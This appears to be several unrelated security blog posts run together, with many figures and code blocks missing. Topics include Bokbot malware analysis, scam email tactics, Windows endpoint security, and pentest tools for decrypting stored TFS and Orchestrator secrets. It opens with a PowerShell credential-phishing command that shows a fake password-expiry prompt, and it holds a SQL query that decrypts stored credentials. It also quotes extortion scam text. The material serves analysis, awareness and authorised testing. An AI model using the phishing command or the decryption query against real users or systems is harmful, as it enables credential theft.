.\Invoke-CredentialPhisher.ps1 -ToastTitle "Consider changing your password" -ToastMessage "Your password will expire in 5 minutes.`r`nTo change your password, click here or press CTRL+ALT+DELETE and then click 'Change a password'." -Application "Control Panel" -credBoxTitle "Windows Password reset" -credBoxMessage "Enter password for user '{samaccountname}'" -ToastType Application


There are no specific recommendations that are applicable to this phishing technique, however, some more generic recommendations are still applicable:

  • Check if PowerShell script logging and transcript logging is enabled;
  • Raise security awareness;
  • Although it is quite hard to distinguish a fake notification toast from a genuine notification toast, users should have a paranoid approach when it comes to processes asking for their credentials.

Bokbot: The (re)birth of a banker

This blogpost is a follow-up to a presentation with the same name, given at SecurityFest in Sweden by Alfred Klason.


Bokbot (aka: IcedID) came to Fox-IT’s attention around the end of May 2017 when we identified an unknown sample in our lab that appeared to be a banker. This sample was also provided by a customer at a later stage.

Having looked into the bot and the operation, the analysis quickly revealed that it’s connected to a well-known actor group that was behind an operation publically known as 76service and later Neverquest/Vawtrak, dating back to 2006.

Neverquest operated for a number of years before an arrest lead to its downfall in January 2017. Just a few months afterwards we discovered a new bot, with a completely new code base but based on ideas and strategies from the days of Neverquest. Their business ties remains intact as they still utilize services from the same groups as seen before but also expanded to use new services.

This suggests that at least parts of the group behind Neverquest is still operating using Bokbot. It’s however unclear how many of the people from the core group that have continued on with Bokbot.

Bokbot is still a relatively new bot, just recently reaching a production state where they have streamlined and tested their creation. Even though it’s a new bot, they still have strong connections within the cybercrime underworld which enables them to maintain and grow their operation such as distributing their bot to a larger number of victims.

By looking back in history and the people who are behind this, it is highly likely that this is a threat that is not going away anytime soon. Fox-IT rather expects an expansion of both the botnet size and their target list.

76service and Neverquest

76service was, what one could call, a big-data mining service for fraud, powered by CRM (aka: Gozi). It was able to gather huge amounts of data from its victims using, for example, formgrabbing where authorization and log-in credentials are retrieved from forms submitted to websites by the infected victim.

76service panel login page (source:

76service login page (source:

The service was initially spotted in 2006 and was put into production in 2007, where the authors started to rent out access to their platform. When given access to the platform, the fraudulent customers of this service could free-text search in the stolen data for credentials that provide access to online services, such as internet banking, email accounts and other online platforms.

76service operated uninterrupted until November 2010, when an Ukrainian national named Nikita Kuzmin got arrested in connection with the operation. This marked the end of the 76service service.

Nice Catch! – The real name of Neverquest

A few months before the arrest of Nikita he shared the source code of CRM within a private group of people which would enable them to continue the development of the malware. This, over time, lead to the appearance of multiple Gozi strains, but there was one which stood out more than the others, namely: Catch.

Catch was the name given internally by the malware authors, but to the security community and the public it was known as Vawtrak or Neverquest.

During this investigation into Catch it became clear that 76service and Catch shared several characteristics. They both, for example, separated their botnets into projects within the panel they used for administering their infrastructure and botnets. Instead of having one huge botnet, they assigned every bot build with a project ID that would be used by the bot to let the Command & Control (C2) server know which specific project the bot belonged to.

76service and Catch also shared the same business model, where they shifted back and forth between a private and rented model.

The private business model meant that they made use of their own botnet, for their own gain, and the rented business model meant that they rented out access to their botnet to customers. This provided them with an additional income stream, instead of only performing the fraud themselves.

The shift between business models could usually be correlated with either: backend servers being seized or people with business ties to the group being arrested. These types of events might have spooked the group as they limited their infrastructure, closing down access for customers.

For the sake of simplicity, Catch will from here on be referred to as Neverquest in this post.

“Quest means business” – Affiliations

If one would identify a Neverquest infection it might not be the only malware that is lurking on the infected system. Neverquest has been known to cooperate with other crimeware groups, either to distribute additional malware or use existing botnets to distribute Neverquest.

During the investigation and tracking of Neverquest Fox-IT identified the following ties:

Crimeware/malware group Usage/functionality
Dyre Download and execute Dyre on Neverquest infections
TinyLoader & AbaddonPOS Download and execute TinyLoader on Neverquest infections. TinyLoader was later seen downloading AbaddonPOS (as mentioned by Proofpoint)
Chanitor/Hancitor Neverquest leverages Chanitor to infect new victims.

By leveraging these business connections, especially the connection with Dyre, Neverquest is able to maximize the monetization of the bots. This since Neverquest could see if a bot was of interest to the group and if not, it could be handed off to Dyre which could cast a wider net, targeting for example a bigger or different geographical region and utilize a bot in a different way.

More on these affiliations in a later section.

The never ending quest comes to an end

Neverquest remained at large from around 2010, causing huge amounts of financial losses, ranging from ticket fraud to wire fraud to credit card fraud. Nevertheless, in January 2017 the quest came to an end, as an individual named Stanislav Lisov was arrested in Spain. This individual was proven to be a key player in the operation: soon after the arrest the backend servers of Neverquest went offline, never to come back online, marking the end of a 6 year long fraud operation.

A more detailed background on 76service and Neverquest can be found in a blogpost by PhishLabs.

A wild Bokbot appears!

Early samples of Bokbot were identified in our lab in May 2017 and also provided to us by a customer. At this time the malware was being distributed to US infections by the Geodo (aka: Emotet) spam botnet. The name Bokbot is based on a researcher who worked on the very early versions of the malware (you know who you are 😉 ).

Initial thoughts were that this was a new banking module for Geodo, as this group had not been involved in banking/fraud since May 2015. This scenario was quickly dismissed after having discovered evidence that linked Bokbot to Neverquest, which will be further outlined hereafter.

Bokbot internals

First, let’s do some housekeeping and look into some of the technical aspects of Bokbot.


All communication between a victim and the C2 server is sent over HTTPS using POST- and GET-requests. The initial request sent to the C2 is a POST-request containing some basic information about the machine it’s running on, as seen in the example below. Any additional requests like requesting configs or modules are sent using GET-requests, except for the uploading of any stolen data such as files, HTML code, screenshots or credentials which the victim submits using POST-requests.

Even though the above request is from a very early version (14) of the bot, the principle still applies to the current version (101), first seen 2018-07-17.

URL param. Comment
b Bot identifier, contains the information needed to identify the individual bot and where it belongs. More information on this in later a section.
d Type of uploaded information. For example screenshot, grabbed form, HTML or a file
e Bot build version
i System uptime
POST-data param. Comment
k Computer name (Unicode, URL-encoded)
l Member of domain… (Unicode, URL-encoded)
j Bot requires signature verification for C2 domains and self-updates
n Bot running with privilege level…
m Windows build information (version, arch., build, etc.)

The parameters that are not included in the table above are used to report stolen data to the C2.

The C2 response of this particular bot version is a simple set of integers which tells the bot which command(s) that should be executed. This is the only C2 response that is unencrypted, all other responses are encrypted using RC4. Some responses are, like the configs, also compressed using LZMAT.

After a response is decrypted, the bot will check if the first 4 bytes equal “zeus”.


If the first 4 bytes are equal to “zeus”, it will decompress the rest of the data.

The reason for choosing “zeus” as the signature remains unknown, it could be an intentional false flag, in an attempt to trick analysts into thinking that this might be a new ZeuS strain. Similar elusive techniques have been used before to trick analysts. A simpler explanation could be that the developer simply had an ironic sense of humor, and chose the first malware name that came to mind as the 4 byte signature.


Bokbot supports three different types of configs, which all are in a binary format rather than some structured format like XML, which is, for example, used by TheTrick.

Config Comment
Bot The latest C2 domains
Injects Contains targets which are subject to web injects and redirection attacks
Reporting Contains targets related to HTML grabbing and screenshots

The first config, which includes the bot C2 domains, is signed. This to prevent that a takeover of any of the C2 domains would result in a sinkholing of the bots. The updates of the bot itself are also signed.

The other two configs are used to control how the bot will interact with the targeted entities, such as redirecting and modifying web traffic related to for example internet banking and/or email providers, for the purpose of harvesting credentials and account information.

The reporting config is used for a more generic purpose, where it’s not only used for screenshots but also for HTML grabbing, which would grab a complete HTML page if a victim browses to an “interesting” website, or if the page contains a specific keyword. This enables the actors to conduct some reconnaissance for future attacks, like being able to write web injects for a previously unknown target.

Geographical foothold

Ever since the appearance Bokbot has been heavily focused on targeting financial institutions in the US even though they’re still gathering any data that they deem interesting such as credentials for online services.

Based on Fox-IT’s observation of the malware spread and the accompanied configs we find that North America seems to be Bokbot’s primary hunting ground while high infection counts have been seen in the following countries:

  • United States
  • Canada
  • India
  • Germany
  • Netherlands
  • France
  • United Kingdom
  • Italy
  • Japan

“I can name fingers and point names!” – Connecting the two groups

The two bots, on a binary level, do not show much similarity other than the fact that they’re both communicating over HTTPS and use RC4 in combination with LZMAT compression. But this wouldn’t be much of an attribution as it’s also a combination used in for example ZeuS Gameover, Citadel and Corebot v1.

The below tables provides a short summary of the similarities between the groups.

Connection Comment
Bot and project ID format The usage of projects and the bot ID generation are unique to these groups along with the format that this information is communicated to the C2.
Inject config The injects and redirection entries are very similar and the format haven’t been seen in any other malware family.
Reporting config The targeted URLs and “interesting” keywords are almost identical between the two.
Affiliations The two group share business affiliations with other crimeware groups.

Bot ID, URL pattern and project IDs

When both Neverquest and Bokbot communicate with their C2 servers, they have to identify themselves by sending their unique bot ID along with a project ID.

An example of the string that the server uses in order to identify a specific bot from its C2 communication is shown below:


The placement of this string is of course different between the families, where Neverquest (in the latest version) placed it, encoded, in the Cookie header field. Older version of Neverquest sent this information in the URL. Bokbot on the other hand sends it in the URL as shown in a previous section.

One important difference is that Neverquest used a simple number for their project ID, 7, in the example above. Bokbot on the other hand is using a different, unknown format for its project ID. A theory is that this could be the CRC checksum of the project name to prevent any leakage of the number of projects or their names, but this is pure speculation.

Another difference is that Bokbot has implemented an 8 bit checksum that is calculated using the project ID and the bot ID. This checksum is then validated on the server side and if it doesn’t match, no commands will be returned.

To this date there has been a total of 20 projects over 25 build versions observed, numbers that keeps on growing.

Inject config – Dynamic redirect structure

The inject config not only contain web injects but also redirects. Bokbot supports both static redirects which redirects a static URL but also dynamic redirects which redirects a request based on a target matched using a regular expression.

The above example is a redirect attack from a Neverquest config. They use a regular expression to match on the requested URL. If it should match they will extract the name of the requested file along with its extension. The two strings are then used to construct a redirect URL controlled by the actors. Thereby, the $1 will be replaced with the file name and $2 will be replaced with the file extension.


How does this compare with Bokbot?


Notice how the redirect URL contains $1 and $2, just as with Neverquest. This could of course be a coincidence but it should be mentioned that this is something that has only been observed in Neverquest and Bokbot.

Reporting config

This config was one of the very first things that hinted about a connection between the two groups. By comparing the configs it becomes quite clear that there is a big overlap in interesting keywords and URLs:


Neverquest is on the left and Bokbot on the right. Note that this is a simple string comparison between the configs which also includes URLs that are to be excluded from reporting.

“Guilt by association” – Affiliations

None of these groups are short on connections in the cybercrime underworld. It’s already mentioned that Neverquest had ties with Dyre, a group which by itself caused substantial financial losses. But it’s also important to take into account that Dyre didn’t completely go away after the group got dismantled but was rather replaced with TheTrick which gives a further hint of a connection.

Neverquest affil. Bokbot affil. Comment
Dyre TheTrick Neverquest downloads & executes Dyre
Bokbot downloads & executes TheTrick
TinyLoader TinyLoader Neverquest downloads & executes TinyLoader which downloads AbaddosPOS
Bokbot downloads & executes TinyLoader, additional payload remains unknown at this time
Chanitor Chanitor Neverquest utilizes Chanitor for distribution of Neverquest
Bokbot utilizes Chanitor for distribution of Bokbot, downloads SendSafe spam malware to older infections.
Geodo Bokbot utilizes Geodo for distributing Bokbot
Gozi-ISFB Bokbot utilizes Gozi-ISFB for distributing Bokbot

There are a few interesting observations with the above affiliations. The first is for the Chanitor affiliation.

When Bokbot was being distributed by Chanitor, an existing Bokbot infection that was running an older version than the one being distributed by Chanitor, would receive a download & execute command which pointed to the SendSafe spambot, used by the Chanitor group to send spam. Suggesting that they may have exchanged “infections for infections”.

The Bokbot affiliation with Geodo is something that cannot be linked to Neverquest, mostly due to the fact that Geodo has not been running its spam operation long enough to overlap with Neverquest.

The below graph show all the observed affiliations to date.


Events over time

All of the above information have been collected over time during the development and tracking of Bokbot. The events and observations can be observed on the below timeline.


The first occurrence of TheTrick being downloaded was in July 2017 but Bokbot has since been downloading TheTrick at different occasions.

At the end of December 2017 there was little Bokbot activity, likely due to the fact that it was holidays. It’s not uncommon for cybercriminals to decrease their activity during the turn of the year, supposedly everyone needs holidays, even cybercriminals. They did however push an inject config to some bots which targeted *.com with the goal of injecting Javascript to mine Monero cryptocurrency. As soon as an infected user visits a website with a .com top-level domain (TLD), the browser would start mining Monero for the Bokbot actors.  This was likely an attempt to passively monetize the bots while the actors was on holiday.

Bokbot remains active and shows no signs of slowing down. Fox-IT will continue to monitor these actors closely.

Making Sense of Microsoft’s Endpoint Security Strategy

Microsoft is no longer content to simply delegate endpoint security on Windows to other software vendors. The company has released, fine-tuned or rebranded  multiple security technologies in a way that will have lasting effects on the industry and Windows users. What is Microsoft’s endpoint security strategy and how is it evolving? Microsoft offers numerous endpoint security technologies, most of which include “Windows Defender” in their name. Some resemble built-in OS features (e.g., Windows Defender SmartScreen), others are free add-ons (e.g., Windows Defender Antivirus), while some are commercial enterprise products (e.g., the EDR component of Windows Defender Advanced Threat Protection). I created a table that explains the nature and dependencies of these capabilities in a single place. Microsoft is in the process of unifying these technologies under the Windows Defender Advanced Threat Protection branding umbrella—the name that originally referred solely to the company’s commercial incident detection and investigation product. Microsoft’s approach to endpoint security appears to be pursuing the following 3 objectives:
  • Motivate other vendors to innovate beyond the commodity security controls that Microsoft offers for its modern OS versions. Windows Defender Antivirus and Windows Defender Firewall with Advanced Security (WFAS) on Windows 10 are examples of such tech. Microsoft has been expanding these essential capabilities to be on par with similar features of commercial products. This not only gives Microsoft control over the security posture of its OS, but also forces other vendors to tackle the more advanced problems on the basis of specialized expertise or other strategic abilities.
  • Expand the revenue stream from enterprise customers. To centrally manage Microsoft’s endpoint security layers, organizations will likely need to purchase System Center Configuration Manager (SCCM) or Microsoft Intune. Obtaining some Microsoft’s security technologies, such as the EDR component of Windows Defender Advanced Threat Protection, requires upgrading to the high-end Windows Enterprise E5 license. By bundling such commercial offerings with other products, rather than making them available in a standalone manner, the company motivates customers to shift all aspects of their IT management to Microsoft.
In pursuing these objectives, Microsoft developed the building blocks that are starting to resemble features of commercial Endpoint Protection Platform (EPP) products. The resulting solution is far from perfect, at least at the moment:
  • Centrally managing and overseeing these components is difficult for companies that haven’t fully embraced Microsoft for all their IT needs or that lack expertise in technologies such as Group Policy.
  • Making sense of the security capabilities, interdependencies and licensing requirements is challenging, frustrating and time-consuming.
  • Most of the endpoint security capabilities worth considering are only available for the latest versions of Windows 10 or Windows Server 2016. Some have hardware dependencies are incompatible with older hardware.
  • Several capabilities have dependencies that are incompatible with other products.  For instance, security features that rely on Hyper-V prevent users from using the VMware hypervisor on the endpoint.
  • Some technologies are still too immature or impractical for real-world deployments. For example, using my Windows 10 system after enabling the Controlled folder access feature became unbearable after a few days.
  • The layers fit together in an awkward manner at times. For instance, Microsoft provides two app whitelisting technologies—Windows Defender Application Control (WDAC) and AppLocker—that overlap in some functionality.
While infringing on the territory traditionally dominated by third-parties on the endpoint, Microsoft leaves room for security vendors to provide value and work together with Microsoft’s security technologies. For example: Some of Microsoft’s endpoint security technologies still feel disjointed. They’re becoming less so, as the company fine-tunes its approach to security and matures its capabilities. Microsoft is steadily guiding enterprises towards embracing Microsoft as the de facto provider of IT products. Though not all enterprises will embrace an all-Microsoft vision for IT, many will. Endpoint security vendors will need to crystallize their role in the resulting ecosystem, expanding and clarifying their unique value proposition. (Coincidentally, that’s what I’m doing at Minerva Labs, where I run product management.)

Retired Malware Samples: Everything Old is New Again

I’m always on the quest for real-world malware samples that help educate professionals how to analyze malicious software. As techniques and technologies change, I introduce new specimens and retire old ones from the reverse-engineering course I teach at SANS Institute.  Here are some of the legacy samples that were once present in FOR610 materials. Though these malicious programs might not appear relevant anymore, aspects of their functionality are present even in modern malware.

A Backdoor with a Backdoor

To learn fundamental aspects of code-based and behavioral malware analysis, the FOR610 course examined Slackbot at one point. It was an IRC-based backdoor, which it’s author “slim” distributed as a compiled Windows executable without source code.

Dated April 18, 2000, Slackbot came with a builder that allowed its user to customize the name of the IRC server and channel it would use for Command and Control (C2). Slackbot documentation explained how the remote attacker could interact with the infected system over their designated channel and included this taunting note:

“don’t bother me about this, if you can’t figure out how to use it, you probably shouldn’t be using a computer. have fun. –slim”

Those who reverse-engineered this sample discovered that it had undocumented functionality. In addition to connecting to the user-specified C2 server, the specimen also reached out to a hardcoded server that “slim” controlled. The channel #penix channel gave “slim” the ability to take over all the botnets that his or her “customers” were building for themselves.

Turned out this backdoor had a backdoor! Not surprisingly, backdoors continue to be present in today’s “hacking” tools. For example, I came across a DarkComet RAT builder that was surreptitiously bundled with a DarkComet backdoor of its own.

You Are an Idiot

The FOR610 course used an example of a simple malevolent web page to introduce the techniques for examining potentially-malicious websites. The page, captured below, was a nuisance that insulted its visitors with the following message:

When the visitor attempted to navigate away from the offending site, its JavaScript popped up new instances of the page, making it very difficult to leave. Moreover, each instance of the page played the following jingle on the victim’s speakers. “You are an idiot,” the song exclaimed. “Ahahahahaha-hahahaha!” The cacophony of multiple windows blasting this jingle was overwhelming.


A while later I came across a network worm that played this sound file on victims’ computers, though I cannot find that sample anymore. While writing this post, I was surprised to discover a version of this page, sans the multi-window JavaScript trap, residing on Maybe it’s true what they say: good joke never gets old.

Clipboard Manipulation

When Flash reigned supreme among banner ad technologies, the FOR610 course covered several examples of such forms of malware. One of the Flash programs we analyzed was a malicious version of the ad pictured below:

At one point, visitors to legitimate websites, such as MSNBC, were reporting that their clipboards appeared “hijacked” when the browser displayed this ad. The advertisement, implemented as a Flash program, was using the ActionScript setClipboard function to replace victims’ clipboard contents with a malicious URL.

The attacker must have expected the victims to blindly paste the URL into messages without looking at what they were sharing. I remembered this sample when reading about a more recent example of malware that replaced Bitcoin addresses stored in the clipboard with the attacker’s own Bitcoin address for payments.

As malware evolves, so do our analysis approaches, and so do the exercises we use in the FOR610 malware analysis course.  It’s fun to reflect upon the samples that at some point were present in the materials. After all, I’ve been covering this topic at SANS Institute since 2001. It’s also interesting to notice that, despite the evolution of the threat landscape, many of the same objectives and tricks persist in today’s malware world.

Scammers Use Breached Personal Details to Persuade Victims

Scammers use a variety of social engineering tactics when persuading victims to follow the desired course of action. One example of this approach involves including in the fraudulent message personal details about the recipient to “prove” that the victim is in the miscreant’s grip. In reality, the sender probably obtained the data from one of the many breaches that provide swindlers with an almost unlimited supply of personal information.

Personalized Porn Extortion Scam

Consider the case of an extortion scam in which the sender claims to have evidence of the victim’s pornography-viewing habits. The scammer demands payment in exchange for suppressing the “compromising evidence.” A variation of this technique was documented by Stu Sjouwerman at KnowBe4 in 2017. In a modern twist, the scammer includes personal details about the recipient—beyond merely the person’s name—such as the password the victim used:

“****** is one of your password and now I will directly come to the point. You do not know anything about me but I know alot about you and you must be thinking why are you getting this e mail, correct?

I actually setup malware on porn video clips (adult porn) & guess what, you visited same adult website to experience fun (you get my drift). And when you got busy enjoying those videos, your web browser started out operating as a RDP (Remote Desktop Protocol) that has a backdoor which provided me with accessibility to your screen and your web camera controls.”

The email includes demand for payment via cryptocurrency such Bitcoin to ensure that “Your naughty secret remains your secret.” The sender calls this “privacy fees.” Variations on this scheme are documented in the Blackmail Email Scam thread on Reddit.

The inclusion of the password that the victim used at some point in the past lends credibility to the sender’s claim that the scammer knows a lot about the recipient. In reality, the miscreant likely obtained the password from one of many data dumps that include email addresses, passwords, and other personal information stolen from breached websites.

Data Breach Lawsuit Scam

In another scenario, the scammer uses the knowledge of the victim’s phone number to “prove” possession of sensitive data. The sender poses as an entity that’s preparing to sue the company that allegedly leaked the data:

“Your data is compromised. We are preparing a lawsuit against the company that allowed a big data leak. If you want to join and find out what data was lost, please contact us via this email. If all our clients win a case, we plan to get a large amount of compensation and all the data and photos that were stolen from the company. We have all information to win. For example, we write to your email and include part your number ****** from a large leak.”

The miscreant’s likely objective is to solicit additional personal information from the victim under the guise of preparing the lawsuit, possibly requesting the social security number, banking account details, etc. The sender might have obtained the victim’s name, email address and phone number from a breached data dump, and is phishing for other, more lucrative data.

What to Do?

If you receive a message that solicits payment or confidential data under the guise of knowing some of your personal information, be skeptical. This is probably a mass-mailed scam and your best approach is usually to ignore the message. In addition, keep an eye on the breaches that might have compromised your data using the free and trusted service Have I Been Pwned by Troy Hunt, change your passwords when this site tells you they’ve been breached, and don’t reuse passwords across websites or apps.

Sometimes an extortion note is real and warrants a closer look and potentially law enforcement involvement. Only you know your situation and can decide on the best course of action. Fortunately, every example that I’ve had a chance to examine turned out to be social engineering trick that recipients were best to ignore.

To better under understand persuasion tactics employed by online scammers, take a look at my earlier articles on this topic:


Cyber is Cyber is Cyber

If you’re in the business of safeguarding data and the systems that process it, what do you call your profession? Are you in cybersecurity? Information security? Computer security, perhaps? The words we use, and the way in which the meaning we assign to them evolves, reflects the reality behind our language. If we examine the factors that influence our desire to use one security title over the other, we’ll better understand the nature of the industry and its driving forces.

Until recently, I’ve had no doubts about describing my calling as an information security professional. Yet, the term cybersecurity is growing in popularity. This might be because the industry continues to embrace the lexicon used in government and military circles, where cyber reigns supreme. Moreover, this is due to the familiarity with the word cyber among non-experts.

When I asked on Twitter about people’s opinions on these terms, I received several responses, including the following:

  • Danny Akacki was surprised to discover, after some research, that the origin of cyber goes deeper than the marketing buzzword that many industry professionals believe it to be.
  • Paul Melson and Loren Dealy Mahler viewed cybersecurity as a subset of information security. Loren suggested that cyber focuses on technology, while Paul considered cyber as a set of practices related to interfacing with adversaries.
  • Maggie O’Reilly mentioned Gartner’s model that, in contrast, used cybersecurity as the overarching discipline that encompasses information security and other components.
  • Rik Ferguson also advocated for cybersecurity over information security, viewing cyber as a term that encompasses muliple components: people, systems, as well as information.
  • Jessica Barker explained that “people outside of our industry relate more to cyber,” proposing that if we want them to engage with us, “we would benefit from embracing the term.”

In line with Danny’s initial negative reaction to the word cyber, I’ve perceived cybersecurity as a term associated with heavy-handed marketing practices. Also, like Paul, Loren, Maggie and Rik, I have a sense that cybersecurity and information security are interrelated and somehow overlap. Jessica’s point regarding laypersons relating to cyber piqued my interest and, ultimately, changed my opinion of this term.

There is a way to dig into cybersecurity and information security to define them as distinct terms. For instance, NIST defines cybersecurity as:

“Prevention of damage to, protection of, and restoration of computers, electronic communications systems, electronic communications services, wire communication, and electronic communication, including information contained therein, to ensure its availability, integrity, authentication, confidentiality, and nonrepudiation.”

Compare that description to NIST’s definition of information security:

“The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.”

From NIST’s perspective, cybersecurity is about safeguarding electronic communications, while information security is about protecting information in all forms. This implies that, at least according to NIST, information security is a subset of cybersecurity. While this nuance might be important in some contexts, such as regulations, the distinction probably won’t remain relevant for long, because of the points Jessica Barker raised.

Jessica’s insightful post on the topic highlights the need for security professionals to use language that our non-specialist stakeholders and people at large understand. She outlines a brief history that lends credence to the word cyber. She also explains that while most practitioners seem to prefer information security, this term is least understood by the public, where cybersecurity is much more popular. She explains that:

“The media have embraced cyber. The board has embraced cyber. The public have embraced cyber. Far from being meaningless, it resonates far more effectively than ‘information’ or ‘data’. So, for me, the use of cyber comes down to one question: what is our goal? If our goal is to engage with and educate as broad a range of people as possible, using ‘cyber’ will help us do that. A bridge has been built, and I suggest we use it.”

Technology and the role it plays in our lives continues to change. Our language evolves with it. I’m convinced that the distinction between cybersecurity and information security will soon become purely academic and ultimately irrelevant even among industry insiders. If the world has embraced cyber, security professionals will end up doing so as well. While I’m unlikely to wean myself off information security right away, I’m starting to gradually transition toward cybersecurity.

Communicating About Cybersecurity in Plain English

When cybersecurity professionals communicate with regular, non-technical people about IT and security, they often use language that virtually guarantees that the message will be ignored or misunderstood. This is often a problem for information security and privacy policies, which are written by subject-matter experts for people who lack the expertise. If you’re creating security documents, take extra care to avoid jargon, wordiness and other issues that plague technical texts.

To strengthen your ability to communicate geeky concepts in plain English, consider the following exercise: Take a boring paragraph from a security assessment report or an information security policy and translate it into a sentence that’s no longer than 15 words without using industry terminology. I’m not suggesting that the resulting statement should replace the original text; instead, I suspect this exercise will train you to write more plainly and succinctly.

For example, I extracted and slightly modified a few paragraphs from the Princeton University Information Security Policy, just so that I could experiment with some public document written in legalese. I then attempted to relay the idea behind each paragraph in the form of a 3-line haiku (5-7-5 syllables per line):

This Policy applies to all Company employees, contractors and other entities acting on behalf of Company. This policy also applies to other individuals and entities granted use of Company information, including, but not limited to, contractors, temporary employees, and volunteers.

If you can read this,
you must follow the rules that
are explained below.

When disclosing Confidential information, the proposed recipient must agree (i) to take appropriate measures to safeguard the confidentiality of the information; (ii) not to disclose the information to any other party for any purpose absent the Company’s prior written consent.

Don’t share without a
contract any information
that’s confidential.

All entities granted use of Company Information are expected to: (i) understand the information classification levels defined in the Information Security Policy; (ii) access information only as needed to meet legitimate business needs.

Know your duties for
safeguarding company info.
Use it properly.

By challenging yourself to shorten a complex concept into a single sentence, you motivate yourself to determine the most important aspect of the text, so you can better communicate it to others. This approach might be especially useful for fine-tuning executive summaries, which often warrant careful attention and wordsmithing. This is just one of the ways in which you can improve your writing skills with deliberate practice.

Introducing Team Foundation Server decryption tool

During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s Team Foundation Server (TFS). TFS can be used for developing code, version control and automatic deployment to target systems. This blogpost provides two tools to decrypt sensitive information that is stored in the TFS database.

Decrypting TFS secrets

Within Team Foundation Server (TFS), it is possible to automate the build, testing and deployment of new releases. With the use of variables it is possible to create a generic deployment process once and customize it per environment.1 Sometimes specific tasks need a set of credentials or other sensitive information and therefor TFS supports encrypted variables. With an encrypted variable the contents of the variables is encrypted in the database and not visible for the user of TFS.


However, with the correct amount of access rights to the database it is possible to decrypt the encrypted content. Sebastian Solnica wrote a blogpost about this, which can be read on the following link:

Fox-IT wrote a PowerShell script that uses the information mentioned in the blogpost. While the blogpost mainly focused on the decryption technique, the PowerShell script is built with usability in mind. The script will query all needed values and display the decrypted values. An example can be seen in the following screenshot:


The script can be downloaded from Fox-IT’s Github repository:

It is also possible to use the script in Metasploit. Fox-IT wrote a post module that can be used through a meterpreter session. The result of the script can be seen in the screenshot below.


There is a pull request pending and hopefully the module will be part of the Metasploit Framework soon. The pull request can be found here:



Introducing Orchestrator decryption tool

Researched and written by Donny Maasland and Rindert Kramer


During penetration tests we sometimes encounter servers running software that use sensitive information as part of the underlying process, such as Microsoft’s System Center Orchestrator.
According to Microsoft, Orchestrator is a workflow management solution for data centers and can be used to automate the creation, monitoring and deployment of resources in your environment.1 This blogpost covers the encryption aspect of Orchestrator and new tools to decrypt sensitive information that is stored in the Orchestrator database.

Orchestrator, variables, encryption and SQL

In Orchestrator, it is possible to create variables that can be used in runbooks. One of the possibilities is to store credentials in these variables. These variables can then be used to authenticate with other systems. Runbooks can use these variables to create an authenticated session towards the target system and run all the steps that are defined in the runbook in the context of the credentials that are specified in the variable.

Information, such as passwords, that is of a sensitive nature can be encrypted by using encrypted variables. The contents of these variables are stored encrypted in the database when they are created and are decrypted when they are used in the runbooks. The picture below displays the dialog to create an encrypted variable.


Orchestrator uses the internal encryption functionality of Microsoft SQL server2 (MSSQL). The decryption keys are stored in the SYS database and have to be loaded in to the SQL session in order to decrypt data.

To decypt the data, we need the encrypted content first. The following query returns the encrypted content:


If there are secret variables stored in the database, this will result in encrypted data, such as:

The data between \`d.T.~De/ is the data we are interested in, which leaves us with the following string:
Please note that the \`d.T.~De/ value might differ per data type.

Since this data is encrypted, the decryption key needs to be loaded in the SQL session. To establish this, we open an SQL session and run the following query:


This will load the decryption key into the SQL session.

Now we run this string against the decryptbykey function in MSSQL3 to decrypt the content with the encryption key that was loaded earlier in the SQL session. If successful, this will result in a varbinary object that we need to convert to nvarchar for human readable output.

The complete SQL query will look like this:

SELECT convert(nvarchar, decryptbykey(0x00F04DA615688A4C96C2891105226AE90100000059A187C285E8AC6C1090F48D0BFD2775165F9558EAE37729DA43BE92AD133CF697D2C5CC1E6E27E534754099780A0362C794C95F3747A1E65E869D2D43EC3597));

Executing this query will return the unencrypted value of the variable, as can be seen in the following screenshot.

Automating the process

Fox-IT created a script that automates this process. The script queries the secrets and decrypts them automatically. The result of the script can be seen in the screenshot below.

The script can be downloaded from Fox-IT’s Github repository:

Fox-IT also wrote a Metasploit post module to run this script through a meterpreter.

The Metasploit module supports integrated login. Optionally, it is possible to use MSSQL authentication by specifying the username and password parameters. By default, the script will use the ‘Orchestrator’ database, but it is also possible to specify another database with the database parameter. Fox-IT did a pull request to add this module to Metasploit, so hopefully the module will be available soon. The pull request can be found here:



Escalating privileges with ACLs in Active Directory

Researched and written by Rindert Kramer and Dirk-jan Mollema


During internal penetration tests, it happens quite often that we manage to obtain Domain Administrative access within a few hours. Contributing to this are insufficient system hardening and the use of insecure Active Directory defaults. In such scenarios publicly available tools help in finding and exploiting these issues and often result in obtaining domain administrative privileges. This blogpost describes a scenario where our standard attack methods did not work and where we had to dig deeper in order to gain high privileges in the domain. We describe more advanced privilege escalation attacks using Access Control Lists and introduce a new tool called Invoke-Aclpwn and an extension to ntlmrelayx that automate the steps for this advanced attack.

AD, ACLs and ACEs

As organizations become more mature and aware when it comes to cyber security, we have to dig deeper in order to escalate our privileges within an Active Directory (AD) domain. Enumeration is key in these kind of scenarios. Often overlooked are the Access Control Lists (ACL) in AD.An ACL is a set of rules that define which entities have which permissions on a specific AD object. These objects can be user accounts, groups, computer accounts, the domain itself and many more. The ACL can be configured on an individual object such as a user account, but can also be configured on an Organizational Unit (OU), which is like a directory within AD. The main advantage of configuring the ACL on an OU is that when configured correctly, all descendent objects will inherit the ACL.The ACL of the Organizational Unit (OU) wherein the objects reside, contains an Access Control Entry (ACE) that defines the identity and the corresponding permissions that are applied on the OU and/or descending objects.The identity that is specified in the ACE does not necessarily need to be the user account itself; it is a common practice to apply permissions to AD security groups. By adding the user account as a member of this security group, the user account is granted the permissions that are configured within the ACE, because the user is a member of that security group.

Group memberships within AD are applied recursively. Let’s say that we have three groups:

  • Group_A
    • Group_B
      • Group_C

Group_C is a member of Group_B which itself is a member of Group_A. When we add Bob as a member of Group_C, Bob will not only be a member of Group_C, but also be an indirect member of Group_B and Group_A. That means that when access to an object or a resource is granted to Group_A, Bob will also have access to that specific resource. This resource can be an NTFS file share, printer or an AD object, such as a user, computer, group or even the domain itself.
Providing permissions and access rights with AD security groups is a great way for maintaining and managing (access to) IT infrastructure. However, it may also lead to potential security risks when groups are nested too often. As written, a user account will inherit all permissions to resources that are set on the group of which the user is a (direct or indirect) member. If Group_A is granted access to modify the domain object in AD, it is quite trivial to discover that Bob inherited these permissions. However, if the user is a direct member of only 1 group and that group is indirectly a member of 50 other groups, it will take much more effort to discover these inherited permissions.

Escalating privileges in AD with Exchange

